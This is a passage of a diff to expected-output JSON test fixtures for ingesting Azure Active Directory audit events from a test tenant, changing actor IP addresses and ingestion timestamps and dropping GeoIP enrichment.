@@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8347,7 +7627,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -8359,12 +7639,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036342400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125060300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -8390,25 +7670,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8422,7 +7684,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8558,7 +7820,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -8570,12 +7832,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036346900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125066900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 